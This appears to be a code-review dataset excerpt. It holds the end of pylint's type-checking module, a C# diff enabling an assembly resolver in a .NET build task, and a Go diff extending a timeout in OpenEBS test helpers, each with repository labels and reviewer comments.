                # Don't store any parameter names within the tuple, since those
                # are not assignable from keyword arguments.
            else:
                assert isinstance(arg, nodes.AssignName)
                # This occurs with:
                #    def f( (a), (b) ): pass
                name = arg.name
                parameter_name_to_index[name] = i
            if i >= num_mandatory_parameters:
                defval = called.args.defaults[i - num_mandatory_parameters]
            else:
                defval = None
            parameters.append([(name, defval), False])

        kwparams = {}
        for i, arg in enumerate(called.args.kwonlyargs):
            if isinstance(arg, nodes.Keyword):
                name = arg.arg
            else:
                assert isinstance(arg, nodes.AssignName)
                name = arg.name
            kwparams[name] = [called.args.kw_defaults[i], False]

        self._check_argument_order(
            node, call_site, called, [p[0][0] for p in parameters]
        )

        # 1. Match the positional arguments.
        for i in range(num_positional_args):
            if i < len(parameters):
                parameters[i][1] = True
            elif called.args.vararg is not None:
                # The remaining positional arguments get assigned to the *args
                # parameter.
                break
            elif not overload_function:
                # Too many positional arguments.
                self.add_message(
                    "too-many-function-args", node=node, args=(callable_name,)
                )
                break

        # 2. Match the keyword arguments.
        for keyword in keyword_args:
            if keyword in parameter_name_to_index:
                i = parameter_name_to_index[keyword]
                if parameters[i][1]:
                    # Duplicate definition of function parameter.

                    # Might be too hardcoded, but this can actually
                    # happen when using str.format and `self` is passed
                    # by keyword argument, as in `.format(self=self)`.
                    # It's perfectly valid to so, so we're just skipping
                    # it if that's the case.
                    if not (keyword == "self" and called.qname() in STR_FORMAT):
                        self.add_message(
                            "redundant-keyword-arg",
                            node=node,
                            args=(keyword, callable_name),
                        )
                else:
                    parameters[i][1] = True
            elif keyword in kwparams:
                if kwparams[keyword][1]:
                    # Duplicate definition of function parameter.
                    self.add_message(
                        "redundant-keyword-arg",
                        node=node,
                        args=(keyword, callable_name),
                    )
                else:
                    kwparams[keyword][1] = True
            elif called.args.kwarg is not None:
                # The keyword argument gets assigned to the **kwargs parameter.
                pass
            elif isinstance(
                called, nodes.FunctionDef
            ) and self._keyword_argument_is_in_all_decorator_returns(called, keyword):
                pass
            elif not overload_function:
                # Unexpected keyword argument.
                self.add_message(
                    "unexpected-keyword-arg", node=node, args=(keyword, callable_name)
                )

        # 3. Match the **kwargs, if any.
        if node.kwargs:
            for i, [(name, defval), assigned] in enumerate(parameters):
                # Assume that *kwargs provides values for all remaining
                # unassigned named parameters.
                if name is not None:
                    parameters[i][1] = True
                else:
                    # **kwargs can't assign to tuples.
                    pass

        # Check that any parameters without a default have been assigned
        # values.
        for [(name, defval), assigned] in parameters:
            if (defval is None) and not assigned:
                display_name = "<tuple>" if name is None else repr(name)
                if not has_no_context_positional_variadic and not overload_function:
                    self.add_message(
                        "no-value-for-parameter",
                        node=node,
                        args=(display_name, callable_name),
                    )

        for name, val in kwparams.items():
            defval, assigned = val
            if (
                defval is None
                and not assigned
                and not has_no_context_keywords_variadic
                and not overload_function
            ):
                self.add_message("missing-kwoa", node=node, args=(name, callable_name))

    @staticmethod
    def _keyword_argument_is_in_all_decorator_returns(
        func: nodes.FunctionDef, keyword: str
    ) -> bool:
        """Check if the keyword argument exists in all signatures of the
        return values of all decorators of the function.
        """
        if not func.decorators:
            return False
        for decorator in func.decorators.nodes:
            inferred = safe_infer(decorator)

            # If we can't infer the decorator we assume it satisfies consumes
            # the keyword, so we don't raise false positives
            if not inferred:
                return True

            # We only check arguments of function decorators
            if not isinstance(inferred, nodes.FunctionDef):
                return False

            for return_value in inferred.infer_call_result():
                # infer_call_result() returns nodes.Const.None for None return values
                # so this also catches non-returning decorators
                if not isinstance(return_value, nodes.FunctionDef):
                    return False

                # If the return value uses a kwarg the keyword will be consumed
                if return_value.args.kwarg:
                    continue

                # Check if the keyword is another type of argument
                if return_value.args.is_argument(keyword):
                    continue

                return False

        return True

    def _check_invalid_sequence_index(self, subscript: nodes.Subscript):
        """Emit invalid-sequence-index when a builtin-sequence subscript uses
        an index that is not an int, a slice, or an object with __index__."""
        # Look for index operations where the parent is a sequence type.
        # If the types can be determined, only allow indices to be int,
        # slice or instances with __index__.
        parent_type = safe_infer(subscript.value)
        if not isinstance(
            parent_type, (nodes.ClassDef, astroid.Instance)
        ) or not has_known_bases(parent_type):
            return None

        # Determine what method on the parent this index will use
        # The parent of this node will be a Subscript, and the parent of that
        # node determines if the Subscript is a get, set, or delete operation.
        if subscript.ctx is astroid.Store:
            methodname = "__setitem__"
        elif subscript.ctx is astroid.Del:
            methodname = "__delitem__"
        else:
            methodname = "__getitem__"

        # Check if this instance's __getitem__, __setitem__, or __delitem__, as
        # appropriate to the statement, is implemented in a builtin sequence
        # type. This way we catch subclasses of sequence types but skip classes
        # that override __getitem__ and which may allow non-integer indices.
        try:
            methods = astroid.interpreter.dunder_lookup.lookup(parent_type, methodname)
            if methods is astroid.Uninferable:
                return None
            itemmethod = methods[0]
        except (
            astroid.AttributeInferenceError,
            IndexError,
        ):
            return None
        if (
            not isinstance(itemmethod, nodes.FunctionDef)
            or itemmethod.root().name != "builtins"
            or not itemmethod.parent
            or itemmethod.parent.name not in SEQUENCE_TYPES
        ):
            return None

        # For ExtSlice objects coming from visit_extslice, no further
        # inference is necessary, since if we got this far the ExtSlice
        # is an error.
        if isinstance(subscript.value, nodes.ExtSlice):
            index_type = subscript.value
        else:
            index_type = safe_infer(subscript.slice)
        if index_type is None or index_type is astroid.Uninferable:
            return None
        # Constants must be of type int
        if isinstance(index_type, nodes.Const):
            if isinstance(index_type.value, int):
                return None
        # Instance values must be int, slice, or have an __index__ method
        elif isinstance(index_type, astroid.Instance):
            if index_type.pytype() in {"builtins.int", "builtins.slice"}:
                return None
            try:
                index_type.getattr("__index__")
                return None
            except astroid.NotFoundError:
                pass
        elif isinstance(index_type, nodes.Slice):
            # A slice can be present
            # here after inferring the index node, which could
            # be a `slice(...)` call for instance.
            return self._check_invalid_slice_index(index_type)

        # Anything else is an error
        self.add_message("invalid-sequence-index", node=subscript)
        return None

    def _check_not_callable(
        self, node: nodes.Call, inferred_call: Optional[nodes.NodeNG]
    ) -> None:
        """Checks to see if the not-callable message should be emitted

        Only functions, generators and objects defining __call__ are "callable"
        We ignore instances of descriptors since astroid cannot properly handle them yet
        """
        # Handle uninferable calls
        if not inferred_call or inferred_call.callable():
            self._check_uninferable_call(node)
            return

        if not isinstance(inferred_call, astroid.Instance):
            self.add_message("not-callable", node=node, args=node.func.as_string())
            return

        # Don't emit if we can't make sure this object is callable.
        if not has_known_bases(inferred_call):
            return

        if inferred_call.parent and isinstance(inferred_call.scope(), nodes.ClassDef):
            # Ignore descriptor instances
            if "__get__" in inferred_call.locals:
                return
            # NamedTuple instances are callable
            if inferred_call.qname() == "typing.NamedTuple":
                return

        self.add_message("not-callable", node=node, args=node.func.as_string())

    @check_messages("invalid-sequence-index")
    def visit_extslice(self, node: nodes.ExtSlice) -> None:
        if not node.parent or not hasattr(node.parent, "value"):
            return None
        # Check extended slice objects as if they were used as a sequence
        # index to check if the object being sliced can support them
        return self._check_invalid_sequence_index(node.parent)

    def _check_invalid_slice_index(self, node: nodes.Slice) -> None:
        """Emit invalid-slice-index for slice parts that are not int, None,
        or an object providing __index__ (unless the sliced object is a
        custom type that may accept them)."""
        # Check the type of each part of the slice
        invalid_slices_nodes: List[nodes.NodeNG] = []
        for index in (node.lower, node.upper, node.step):
            if index is None:
                continue

            index_type = safe_infer(index)
            if index_type is None or index_type is astroid.Uninferable:
                continue

            # Constants must be of type int or None
            if isinstance(index_type, nodes.Const):
                if isinstance(index_type.value, (int, type(None))):
                    continue
            # Instance values must be of type int, None or an object
            # with __index__
            elif isinstance(index_type, astroid.Instance):
                if index_type.pytype() in {"builtins.int", "builtins.NoneType"}:
                    continue
                try:
                    index_type.getattr("__index__")
                    return
                except astroid.NotFoundError:
                    pass
            invalid_slices_nodes.append(index)

        if not invalid_slices_nodes:
            return

        # Anything else is an error, unless the object that is indexed
        # is a custom object, which knows how to handle this kind of slices
        parent = node.parent
        if isinstance(parent, nodes.ExtSlice):
            parent = parent.parent
        if isinstance(parent, nodes.Subscript):
            inferred = safe_infer(parent.value)
            if inferred is None or inferred is astroid.Uninferable:
                # Don't know what this is
                return
            known_objects = (
                nodes.List,
                nodes.Dict,
                nodes.Tuple,
                astroid.objects.FrozenSet,
                nodes.Set,
            )
            if not isinstance(inferred, known_objects):
                # Might be an instance that knows how to handle this slice object
                return
        for snode in invalid_slices_nodes:
            self.add_message("invalid-slice-index", node=snode)

    @check_messages("not-context-manager")
    def visit_with(self, node: nodes.With) -> None:
        for ctx_mgr, _ in node.items:
            context = astroid.context.InferenceContext()
            inferred = safe_infer(ctx_mgr, context=context)
            if inferred is None or inferred is astroid.Uninferable:
                continue

            if isinstance(inferred, astroid.bases.Generator):
                # Check if we are dealing with a function decorated
                # with contextlib.contextmanager.
                if decorated_with(
                    inferred.parent, self.config.contextmanager_decorators
                ):
                    continue
                # If the parent of the generator is not the context manager itself,
                # that means that it could have been returned from another
                # function which was the real context manager.
                # The following approach is more of a hack rather than a real
                # solution: walk all the inferred statements for the
                # given *ctx_mgr* and if you find one function scope
                # which is decorated, consider it to be the real
                # manager and give up, otherwise emit not-context-manager.
# See the test file for not_context_manager for a couple # of self explaining tests. # Retrieve node from all previously visited nodes in the # inference history context_path_names: Iterator[Any] = filter( None, _unflatten(context.path) ) inferred_paths = _flatten_container( safe_infer(path) for path in context_path_names ) for inferred_path in inferred_paths: if not inferred_path: continue scope = inferred_path.scope() if not isinstance(scope, nodes.FunctionDef): continue if decorated_with(scope, self.config.contextmanager_decorators): break else: self.add_message( "not-context-manager", node=node, args=(inferred.name,) ) else: try: inferred.getattr("__enter__") inferred.getattr("__exit__") except astroid.NotFoundError: if isinstance(inferred, astroid.Instance): # If we do not know the bases of this class, # just skip it. if not has_known_bases(inferred): continue # Just ignore mixin classes. if self.config.ignore_mixin_members: if inferred.name[-5:].lower() == "mixin": continue self.add_message( "not-context-manager", node=node, args=(inferred.name,) ) @check_messages("invalid-unary-operand-type") def visit_unaryop(self, node: nodes.UnaryOp) -> None: """Detect TypeErrors for unary operands.""" for error in node.type_errors(): # Let the error customize its output. self.add_message("invalid-unary-operand-type", args=str(error), node=node) @check_messages("unsupported-binary-operation") def visit_binop(self, node: nodes.BinOp) -> None: if node.op == "|": self._detect_unsupported_alternative_union_syntax(node) def _detect_unsupported_alternative_union_syntax(self, node: nodes.BinOp) -> None: """Detect if unsupported alternative Union syntax (PEP 604) was used.""" if self._py310_plus: # 310+ supports the new syntax return if isinstance( node.parent, TYPE_ANNOTATION_NODES_TYPES ) and not is_postponed_evaluation_enabled(node): # Use in type annotations only allowed if # postponed evaluation is enabled. 
self._check_unsupported_alternative_union_syntax(node) if isinstance( node.parent, ( nodes.Assign, nodes.Call, nodes.Keyword, nodes.Dict, nodes.Tuple, nodes.Set, nodes.List, nodes.BinOp, ), ): # Check other contexts the syntax might appear, but are invalid. # Make sure to filter context if postponed evaluation is enabled # and parent is allowed node type. allowed_nested_syntax = False if is_postponed_evaluation_enabled(node): parent_node = node.parent while True: if isinstance(parent_node, TYPE_ANNOTATION_NODES_TYPES): allowed_nested_syntax = True break parent_node = parent_node.parent if isinstance(parent_node, nodes.Module): break if not allowed_nested_syntax: self._check_unsupported_alternative_union_syntax(node) def _check_unsupported_alternative_union_syntax(self, node: nodes.BinOp) -> None: """Check if left or right node is of type `type`.""" msg = "unsupported operand type(s) for |" for n in (node.left, node.right): n = astroid.helpers.object_type(n) if isinstance(n, nodes.ClassDef) and is_classdef_type(n): self.add_message("unsupported-binary-operation", args=msg, node=node) break @check_messages("unsupported-binary-operation") def _visit_binop(self, node: nodes.BinOp) -> None: """Detect TypeErrors for binary arithmetic operands.""" self._check_binop_errors(node) @check_messages("unsupported-binary-operation") def _visit_augassign(self, node: nodes.AugAssign) -> None: """Detect TypeErrors for augmented binary arithmetic operands.""" self._check_binop_errors(node) def _check_binop_errors(self, node): for error in node.type_errors(): # Let the error customize its output. 
if any( isinstance(obj, nodes.ClassDef) and not has_known_bases(obj) for obj in (error.left_type, error.right_type) ): continue self.add_message("unsupported-binary-operation", args=str(error), node=node) def _check_membership_test(self, node): if is_inside_abstract_class(node): return if is_comprehension(node): return inferred = safe_infer(node) if inferred is None or inferred is astroid.Uninferable: return if not supports_membership_test(inferred): self.add_message( "unsupported-membership-test", args=node.as_string(), node=node ) @check_messages("unsupported-membership-test") def visit_compare(self, node: nodes.Compare) -> None: if len(node.ops) != 1: return op, right = node.ops[0] if op in {"in", "not in"}: self._check_membership_test(right) @check_messages( "unsubscriptable-object", "unsupported-assignment-operation", "unsupported-delete-operation", "unhashable-dict-key", "invalid-sequence-index", "invalid-slice-index", ) def visit_subscript(self, node: nodes.Subscript) -> None: self._check_invalid_sequence_index(node) supported_protocol: Optional[Callable[[Any, Any], bool]] = None if isinstance(node.value, (nodes.ListComp, nodes.DictComp)): return if isinstance(node.value, nodes.Dict): # Assert dict key is hashable inferred = safe_infer(node.slice) if inferred and inferred != astroid.Uninferable: try: hash_fn = next(inferred.igetattr("__hash__")) except astroid.InferenceError: pass else: if getattr(hash_fn, "value", True) is None: self.add_message("unhashable-dict-key", node=node.value) if node.ctx == astroid.Load: supported_protocol = supports_getitem msg = "unsubscriptable-object" elif node.ctx == astroid.Store: supported_protocol = supports_setitem msg = "unsupported-assignment-operation" elif node.ctx == astroid.Del: supported_protocol = supports_delitem msg = "unsupported-delete-operation" if isinstance(node.value, nodes.SetComp): self.add_message(msg, args=node.value.as_string(), node=node.value) return if is_inside_abstract_class(node): return inferred 
= safe_infer(node.value) if inferred is None or inferred is astroid.Uninferable: return if getattr(inferred, "decorators", None): first_decorator = astroid.helpers.safe_infer(inferred.decorators.nodes[0]) if isinstance(first_decorator, nodes.ClassDef): inferred = first_decorator.instantiate_class() else: return # It would be better to handle function # decorators, but let's start slow. if supported_protocol and not supported_protocol(inferred, node): self.add_message(msg, args=node.value.as_string(), node=node.value) @check_messages("dict-items-missing-iter") def visit_for(self, node: nodes.For) -> None: if not isinstance(node.target, nodes.Tuple): # target is not a tuple return if not len(node.target.elts) == 2: # target is not a tuple of two elements return iterable = node.iter if not isinstance(iterable, nodes.Name): # it's not a bare variable return inferred = safe_infer(iterable) if not inferred: return if not isinstance(inferred, nodes.Dict): # the iterable is not a dict return if all(isinstance(i[0], nodes.Tuple) for i in inferred.items): # if all keys are tuples return self.add_message("dict-iter-missing-items", node=node) class IterableChecker(BaseChecker): """Checks for non-iterables used in an iterable context. Contexts include: - for-statement - starargs in function call - `yield from`-statement - list, dict and set comprehensions - generator expressions Also checks for non-mappings in function call kwargs. 
""" __implements__ = (IAstroidChecker,) name = "typecheck" msgs = { "E1133": ( "Non-iterable value %s is used in an iterating context", "not-an-iterable", "Used when a non-iterable value is used in place where " "iterable is expected", ), "E1134": ( "Non-mapping value %s is used in a mapping context", "not-a-mapping", "Used when a non-mapping value is used in place where " "mapping is expected", ), } @staticmethod def _is_asyncio_coroutine(node): if not isinstance(node, nodes.Call): return False inferred_func = safe_infer(node.func) if not isinstance(inferred_func, nodes.FunctionDef): return False if not inferred_func.decorators: return False for decorator in inferred_func.decorators.nodes: inferred_decorator = safe_infer(decorator) if not isinstance(inferred_decorator, nodes.FunctionDef): continue if inferred_decorator.qname() != ASYNCIO_COROUTINE: continue return True return False def _check_iterable(self, node, check_async=False): if is_inside_abstract_class(node) or is_comprehension(node): return inferred = safe_infer(node) if not inferred: return if not is_iterable(inferred, check_async=check_async): self.add_message("not-an-iterable", args=node.as_string(), node=node) def _check_mapping(self, node): if is_inside_abstract_class(node): return if isinstance(node, nodes.DictComp): return inferred = safe_infer(node) if inferred is None or inferred is astroid.Uninferable: return if not is_mapping(inferred): self.add_message("not-a-mapping", args=node.as_string(), node=node) @check_messages("not-an-iterable") def visit_for(self, node: nodes.For) -> None: self._check_iterable(node.iter) @check_messages("not-an-iterable") def visit_asyncfor(self, node: nodes.AsyncFor) -> None: self._check_iterable(node.iter, check_async=True) @check_messages("not-an-iterable") def visit_yieldfrom(self, node: nodes.YieldFrom) -> None: if self._is_asyncio_coroutine(node.value): return self._check_iterable(node.value) @check_messages("not-an-iterable", "not-a-mapping") def 
visit_call(self, node: nodes.Call) -> None: for stararg in node.starargs: self._check_iterable(stararg.value) for kwarg in node.kwargs: self._check_mapping(kwarg.value) @check_messages("not-an-iterable") def visit_listcomp(self, node: nodes.ListComp) -> None: for gen in node.generators: self._check_iterable(gen.iter, check_async=gen.is_async) @check_messages("not-an-iterable") def visit_dictcomp(self, node: nodes.DictComp) -> None: for gen in node.generators: self._check_iterable(gen.iter, check_async=gen.is_async) @check_messages("not-an-iterable") def visit_setcomp(self, node: nodes.SetComp) -> None: for gen in node.generators: self._check_iterable(gen.iter, check_async=gen.is_async) @check_messages("not-an-iterable") def visit_generatorexp(self, node: nodes.GeneratorExp) -> None: for gen in node.generators: self._check_iterable(gen.iter, check_async=gen.is_async) @check_messages("await-outside-async") def visit_await(self, node: nodes.Await) -> None: self._check_await_outside_coroutine(node) def _check_await_outside_coroutine(self, node: nodes.Await) -> None: node_scope = node.scope() while not isinstance(node_scope, nodes.Module): if isinstance(node_scope, nodes.AsyncFunctionDef): return if isinstance(node_scope, nodes.FunctionDef): break node_scope = node_scope.parent.scope() self.add_message("await-outside-async", node=node) def register(linter: "PyLinter") -> None: linter.register_checker(TypeChecker(linter)) linter.register_checker(IterableChecker(linter))
1
20,331
Not sure if we need this. It's not tested because it only guards against a new conditional definition of a dunder method in a built-in package. I am fine with leaving it out.
PyCQA-pylint
py
@@ -0,0 +1,16 @@ +// Licensed to the .NET Foundation under one or more agreements. +// The .NET Foundation licenses this file to you under the MIT license. +// See the LICENSE file in the project root for more information. + +using Microsoft.DotNet.Build.Common.Desktop; + +namespace Microsoft.DotNet.Build.Tasks.Feed +{ + public partial class PushToBlobFeed + { + static PushToBlobFeed() + { + AssemblyResolver.Enable(); + } + } +}
1
1
14,575
Is this the only task in this library? If so this is good, if not then we should do it for each task.
dotnet-buildtools
.cs
@@ -245,7 +245,7 @@ func (ops *Operations) GetCstorVolumeCountEventually(namespace, lselector string cvCount := ops.GetCVCount(namespace, lselector) return cvCount }, - 60, 10).Should(Equal(expectedCVCount)) + 120, 10).Should(Equal(expectedCVCount)) } // GetCstorVolumeReplicaCountEventually gives the count of cstorvolume based on
1
/* Copyright 2019 The OpenEBS Authors Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package tests import ( "bytes" "fmt" "time" . "github.com/onsi/ginkgo" . "github.com/onsi/gomega" apis "github.com/openebs/maya/pkg/apis/openebs.io/v1alpha1" bd "github.com/openebs/maya/pkg/blockdevice/v1alpha2" csp "github.com/openebs/maya/pkg/cstorpool/v1alpha3" cv "github.com/openebs/maya/pkg/cstorvolume/v1alpha1" cvr "github.com/openebs/maya/pkg/cstorvolumereplica/v1alpha1" errors "github.com/openebs/maya/pkg/errors/v1alpha1" kubeclient "github.com/openebs/maya/pkg/kubernetes/client/v1alpha1" deploy "github.com/openebs/maya/pkg/kubernetes/deployment/appsv1/v1alpha1" ns "github.com/openebs/maya/pkg/kubernetes/namespace/v1alpha1" pvc "github.com/openebs/maya/pkg/kubernetes/persistentvolumeclaim/v1alpha1" pod "github.com/openebs/maya/pkg/kubernetes/pod/v1alpha1" svc "github.com/openebs/maya/pkg/kubernetes/service/v1alpha1" snap "github.com/openebs/maya/pkg/kubernetes/snapshot/v1alpha1" sc "github.com/openebs/maya/pkg/kubernetes/storageclass/v1alpha1" spc "github.com/openebs/maya/pkg/storagepoolclaim/v1alpha1" templatefuncs "github.com/openebs/maya/pkg/templatefuncs/v1alpha1" unstruct "github.com/openebs/maya/pkg/unstruct/v1alpha2" result "github.com/openebs/maya/pkg/upgrade/result/v1alpha1" "github.com/openebs/maya/tests/artifacts" corev1 "k8s.io/api/core/v1" k8serrors "k8s.io/apimachinery/pkg/api/errors" metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" "k8s.io/client-go/kubernetes/scheme" 
"k8s.io/client-go/tools/remotecommand" ) const ( maxRetry = 30 ) // Options holds the args used for exec'ing into the pod type Options struct { podName string container string namespace string cmd []string } // Operations provides clients amd methods to perform operations type Operations struct { KubeClient *kubeclient.Client PodClient *pod.KubeClient SCClient *sc.Kubeclient PVCClient *pvc.Kubeclient NSClient *ns.Kubeclient SnapClient *snap.Kubeclient CSPClient *csp.Kubeclient SPCClient *spc.Kubeclient SVCClient *svc.Kubeclient CVClient *cv.Kubeclient CVRClient *cvr.Kubeclient URClient *result.Kubeclient UnstructClient *unstruct.Kubeclient DeployClient *deploy.Kubeclient BDClient *bd.Kubeclient kubeConfigPath string } // OperationsOptions abstracts creating an // instance of operations type OperationsOptions func(*Operations) // WithKubeConfigPath sets the kubeConfig path // against operations instance func WithKubeConfigPath(path string) OperationsOptions { return func(ops *Operations) { ops.kubeConfigPath = path } } // NewOperations returns a new instance of kubeclient meant for // cstor volume replica operations func NewOperations(opts ...OperationsOptions) *Operations { ops := &Operations{} for _, o := range opts { o(ops) } ops.withDefaults() return ops } // NewOptions returns the new instance of Options func NewOptions() *Options { return new(Options) } // WithPodName fills the podName field in Options struct func (o *Options) WithPodName(name string) *Options { o.podName = name return o } // WithNamespace fills the namespace field in Options struct func (o *Options) WithNamespace(ns string) *Options { o.namespace = ns return o } // WithContainer fills the container field in Options struct func (o *Options) WithContainer(container string) *Options { o.container = container return o } // WithCommand fills the cmd field in Options struct func (o *Options) WithCommand(cmd ...string) *Options { o.cmd = cmd return o } // withDefaults sets the default options // of 
operations instance func (ops *Operations) withDefaults() { var err error if ops.KubeClient == nil { ops.KubeClient = kubeclient.New(kubeclient.WithKubeConfigPath(ops.kubeConfigPath)) } if ops.NSClient == nil { ops.NSClient = ns.NewKubeClient(ns.WithKubeConfigPath(ops.kubeConfigPath)) } if ops.SCClient == nil { ops.SCClient = sc.NewKubeClient(sc.WithKubeConfigPath(ops.kubeConfigPath)) } if ops.PodClient == nil { ops.PodClient = pod.NewKubeClient(pod.WithKubeConfigPath(ops.kubeConfigPath)) } if ops.PVCClient == nil { ops.PVCClient = pvc.NewKubeClient(pvc.WithKubeConfigPath(ops.kubeConfigPath)) } if ops.SnapClient == nil { ops.SnapClient = snap.NewKubeClient(snap.WithKubeConfigPath(ops.kubeConfigPath)) } if ops.SPCClient == nil { ops.SPCClient = spc.NewKubeClient(spc.WithKubeConfigPath(ops.kubeConfigPath)) } if ops.CSPClient == nil { ops.CSPClient, err = csp.KubeClient().WithKubeConfigPath(ops.kubeConfigPath) Expect(err).To(BeNil(), "while initilizing csp client") } if ops.CVClient == nil { ops.CVClient = cv.NewKubeclient(cv.WithKubeConfigPath(ops.kubeConfigPath)) } if ops.CVRClient == nil { ops.CVRClient = cvr.NewKubeclient(cvr.WithKubeConfigPath(ops.kubeConfigPath)) } if ops.URClient == nil { ops.URClient = result.NewKubeClient(result.WithKubeConfigPath(ops.kubeConfigPath)) } if ops.UnstructClient == nil { ops.UnstructClient = unstruct.NewKubeClient(unstruct.WithKubeConfigPath(ops.kubeConfigPath)) } if ops.DeployClient == nil { ops.DeployClient = deploy.NewKubeClient(deploy.WithKubeConfigPath(ops.kubeConfigPath)) } if ops.BDClient == nil { ops.BDClient = bd.NewKubeClient(bd.WithKubeConfigPath(ops.kubeConfigPath)) } } // VerifyOpenebs verify running state of required openebs control plane components func (ops *Operations) VerifyOpenebs(expectedPodCount int) *Operations { By("waiting for maya-apiserver pod to come into running state") podCount := ops.GetPodRunningCountEventually( string(artifacts.OpenebsNamespace), string(artifacts.MayaAPIServerLabelSelector), 
expectedPodCount, ) Expect(podCount).To(Equal(expectedPodCount)) By("waiting for openebs-provisioner pod to come into running state") podCount = ops.GetPodRunningCountEventually( string(artifacts.OpenebsNamespace), string(artifacts.OpenEBSProvisionerLabelSelector), expectedPodCount, ) Expect(podCount).To(Equal(expectedPodCount)) By("Verifying 'admission-server' pod status as running") _ = ops.GetPodRunningCountEventually(string(artifacts.OpenebsNamespace), string(artifacts.OpenEBSAdmissionServerLabelSelector), expectedPodCount, ) Expect(podCount).To(Equal(expectedPodCount)) return ops } // GetPodRunningCountEventually gives the number of pods running eventually func (ops *Operations) GetPodRunningCountEventually(namespace, lselector string, expectedPodCount int) int { var podCount int for i := 0; i < maxRetry; i++ { podCount = ops.GetPodRunningCount(namespace, lselector) if podCount == expectedPodCount { return podCount } time.Sleep(5 * time.Second) } return podCount } // GetCstorVolumeCount gives the count of cstorvolume based on // selecter func (ops *Operations) GetCstorVolumeCount(namespace, lselector string, expectedCVCount int) int { var cvCount int for i := 0; i < maxRetry; i++ { cvCount = ops.GetCVCount(namespace, lselector) if cvCount == expectedCVCount { return cvCount } time.Sleep(5 * time.Second) } return cvCount } // GetCstorVolumeCountEventually gives the count of cstorvolume based on // selecter eventually func (ops *Operations) GetCstorVolumeCountEventually(namespace, lselector string, expectedCVCount int) bool { return Eventually(func() int { cvCount := ops.GetCVCount(namespace, lselector) return cvCount }, 60, 10).Should(Equal(expectedCVCount)) } // GetCstorVolumeReplicaCountEventually gives the count of cstorvolume based on // selecter eventually func (ops *Operations) GetCstorVolumeReplicaCountEventually(namespace, lselector string, expectedCVRCount int) bool { return Eventually(func() int { cvCount := ops.GetCstorVolumeReplicaCount(namespace, 
lselector) return cvCount }, 60, 10).Should(Equal(expectedCVRCount)) } // GetPodRunningCount gives number of pods running currently func (ops *Operations) GetPodRunningCount(namespace, lselector string) int { pods, err := ops.PodClient. WithNamespace(namespace). List(metav1.ListOptions{LabelSelector: lselector}) Expect(err).ShouldNot(HaveOccurred()) return pod. ListBuilderForAPIList(pods). WithFilter(pod.IsRunning()). List(). Len() } // GetCVCount gives cstorvolume healthy count currently based on selecter func (ops *Operations) GetCVCount(namespace, lselector string) int { cvs, err := ops.CVClient. List(metav1.ListOptions{LabelSelector: lselector}) Expect(err).ShouldNot(HaveOccurred()) return cv. NewListBuilder(). WithAPIList(cvs). WithFilter(cv.IsHealthy()). List(). Len() } // GetCstorVolumeReplicaCount gives cstorvolumereplica healthy count currently based on selecter func (ops *Operations) GetCstorVolumeReplicaCount(namespace, lselector string) int { cvrs, err := ops.CVRClient. List(metav1.ListOptions{LabelSelector: lselector}) Expect(err).ShouldNot(HaveOccurred()) return cvr. ListBuilder(). WithAPIList(cvrs). WithFilter(cvr.IsHealthy()). List(). Len() } // IsPVCBound checks if the pvc is bound or not func (ops *Operations) IsPVCBound(pvcName string) bool { volume, err := ops.PVCClient. Get(pvcName, metav1.GetOptions{}) Expect(err).ShouldNot(HaveOccurred()) return pvc.NewForAPIObject(volume).IsBound() } // IsPVCBoundEventually checks if the pvc is bound or not eventually func (ops *Operations) IsPVCBoundEventually(pvcName string) bool { return Eventually(func() bool { volume, err := ops.PVCClient. Get(pvcName, metav1.GetOptions{}) Expect(err).ShouldNot(HaveOccurred()) return pvc.NewForAPIObject(volume).IsBound() }, 60, 10). Should(BeTrue()) } // IsPodRunningEventually checks if the pvc is bound or not eventually func (ops *Operations) IsPodRunningEventually(namespace, podName string) bool { return Eventually(func() bool { p, err := ops.PodClient. 
WithNamespace(namespace). Get(podName, metav1.GetOptions{}) Expect(err).ShouldNot(HaveOccurred()) return pod.NewForAPIObject(p). IsRunning() }, 150, 10). Should(BeTrue()) } // GetSnapshotTypeEventually returns type of snapshot eventually func (ops *Operations) GetSnapshotTypeEventually(snapName string) string { var snaptype string for i := 0; i < maxRetry; i++ { snaptype = ops.GetSnapshotType(snapName) if snaptype == "Ready" { return snaptype } time.Sleep(5 * time.Second) } return snaptype } // GetSnapshotType returns type of snapshot currently func (ops *Operations) GetSnapshotType(snapName string) string { snap, err := ops.SnapClient. Get(snapName, metav1.GetOptions{}) Expect(err).ShouldNot(HaveOccurred()) if len(snap.Status.Conditions) > 0 { return string(snap.Status.Conditions[0].Type) } return "NotReady" } // IsSnapshotDeleted checks if the snapshot is deleted or not func (ops *Operations) IsSnapshotDeleted(snapName string) bool { for i := 0; i < maxRetry; i++ { _, err := ops.SnapClient. Get(snapName, metav1.GetOptions{}) if err != nil { return isNotFound(err) } time.Sleep(5 * time.Second) } return false } // IsPVCDeleted tries to get the deleted pvc // and returns true if pvc is not found // else returns false func (ops *Operations) IsPVCDeleted(pvcName string) bool { _, err := ops.PVCClient. Get(pvcName, metav1.GetOptions{}) if isNotFound(err) { return true } return false } // IsPodDeletedEventually checks if the pod is deleted or not eventually func (ops *Operations) IsPodDeletedEventually(namespace, podName string) bool { return Eventually(func() bool { _, err := ops.PodClient. WithNamespace(namespace). Get(podName, metav1.GetOptions{}) return isNotFound(err) }, 60, 10). Should(BeTrue()) } // GetPVNameFromPVCName gives the pv name for the given pvc func (ops *Operations) GetPVNameFromPVCName(pvcName string) string { p, err := ops.PVCClient. 
